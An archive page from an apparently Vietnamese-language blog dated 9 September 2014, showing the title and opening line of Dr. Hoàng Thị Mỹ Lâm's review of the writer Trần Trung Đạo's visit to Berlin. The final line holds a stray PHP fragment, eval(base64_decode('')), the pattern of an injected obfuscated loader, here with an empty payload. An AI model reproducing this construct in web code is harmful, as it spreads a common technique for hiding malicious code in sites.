Archive for September 9th, 2014

BS Hoàng  Thị Mỹ Lâm: Trần Trung Đạo đến Berlin

BS Hoàng Thị Mỹ Lâm: Trần Trung Đạo đến Berlin

Dùng văn chương để mô tả một nhà văn thì chẳng khác gì múa rìu qua mắt thợ. Nhưng nhiều khi văn chương chỉ dùng để diễn tả một cảm xúc, một ấn tượng nên dù hay hoặc dở thì đó chỉ là một phương tiện để diễn đạt một khía

09.9.2014 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>